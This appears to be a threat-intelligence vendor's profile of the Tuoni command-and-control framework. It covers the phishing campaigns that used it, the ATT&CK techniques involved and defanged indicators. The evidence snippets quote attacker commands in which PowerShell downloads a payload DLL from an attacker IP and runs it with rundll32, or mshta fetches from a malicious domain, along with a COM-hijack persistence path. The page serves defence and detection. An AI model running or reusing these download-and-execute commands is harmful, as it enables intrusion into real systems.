Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Malware

Tuoni

Tuoni is a command-and-control and red teaming/post-exploitation framework first released on GitHub in February 2024. Reporting in the provided content describes it as a relatively new tool that has been abused in real-world intrusions despite its red-team origin. Observed use is focused on Windows systems, including execution of a Tuoni client via PowerShell download and rundll32, stealthy loading of TuoniAgent.dll, and delivery as a final DLL payload by an OLLVM-obfuscated loader.

The content links Tuoni to multiple intrusion chains. In one phishing campaign targeting Russian companies involved in business-process automation software, attackers used malicious archives, LNK files, HTA scripts, and PowerShell; on one infected host they downloaded a Tuoni client from 194.87.252[.]40:9375 and executed it with rundll32. Kaspersky also reported Operation ForumTroll using spear-phishing against Russian scholars in political science, international relations, and global economics at major universities and research institutions. That campaign impersonated eLibrary via e-library[.]wiki, delivered personalized ZIP archives containing malicious LNK files, used PowerShell to fetch payloads, established persistence through COM hijacking at HKCR\CLSID{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32, and ultimately deployed Tuoni as the final payload. ForumTroll infrastructure included fastly.net hosts such as perf-service-clients2.global.ssl.fastly[.]net, bus-pod-tenant.global.ssl.fastly[.]net, and status-portal-api.global.ssl.fastly[.]net.

Morphisec reported threat actors abusing Tuoni in an unsuccessful attack against a major U.S. real estate firm. In that case, the intrusion allegedly began with social engineering that led an employee to run a malicious PowerShell one-liner. The chain then used a concealed PowerShell process, a secondary script with AI-generated comments, BMP downloads, shellcode extraction, inline C# compilation, delegate-based invocation, and reflective in-memory execution to load TuoniAgent.dll. The content states that Tuoni was used with steganography, AI-generated code/comments, and memory-only execution to evade detection, steal credentials, maintain long-term access, and prepare systems for ransomware deployment. The provided material also references Tuoni in network and endpoint detection content, including HTTP C2 framework user-agent analytics and suspicious C2 named-pipe analytics.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.003Spearphishing via ServiceEvidence1

Threat actors suspected of impersonating Microsoft Teams corporate contacts lured an employee to execute a nefarious PowerShell one-liner

Execution

2 techniques
T1059.001PowerShellEvidence2

forfiles.exe ... / c " powershell ... mshta.exe https://sportsboulevard-shop[.]com/..."; powershell.exe - noprofile - command "(New-Object System.Net.WebClient).DownloadFile(...)"

T1559Inter-Process CommunicationEvidence1

Annotations ID Technique Tactic T1559 Inter-Process Communication Execution

Privilege Escalation

1 technique
T1055Process InjectionEvidence2

eventual in-memory execution of the extracted shellcode

Stealth

4 techniques
T1027.003SteganographyEvidence1

Running the script led to BMP file downloading and eventual in-memory execution of the extracted shellcode

T1055Process InjectionEvidence2

eventual in-memory execution of the extracted shellcode

T1218.011Rundll32Evidence1

rundll32.exe services.dll, bob

T1620Reflective Code LoadingEvidence2

resulting in the stealthy loading of TuoniAgent.dll

Lateral Movement

1 technique
T1021.002SMB/Windows Admin SharesEvidence1

Annotations ID Technique Tactic T1021.002 SMB/Windows Admin Shares Lateral Movement

Command and Control

4 techniques
T1071Application Layer ProtocolEvidence1

A new wave of cyberattacks has emerged using the Tuoni C2 framework, a sophisticated tool that allows threat actors to deploy malicious payloads directly into system memory.

T1071.001Web ProtocolsEvidence2

MITRE ATT&CK Techniques ID Technique Tactic T1071.001 Web Protocols Command And Control

T1105Ingress Tool TransferEvidence1

Вредоносный скрипт скачивает и запускает еще два файла... конечную вредоносную нагрузку... Remcos; ... приводил к скачиванию архива file.zip...; ... DownloadFile('http://194.87.252[.]40:9375/payload?payloadId=59','services.dll')

T1219Remote Access ToolsEvidence1

Remcos (Remote Control & Surveillance) — это вредоносное программное обеспечение класса троянских программ удаленного доступа (RAT).

INDICATORS OF COMPROMISE

IOCs tracked for this family

3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
hash.md5●●●●●●●●●●●●View more in app2 years ago
ip.v4●●●●●●●●●●●●View more in app2 years ago
uri●●●●●●●●●●●●View more in app2 years ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching3

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping12

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.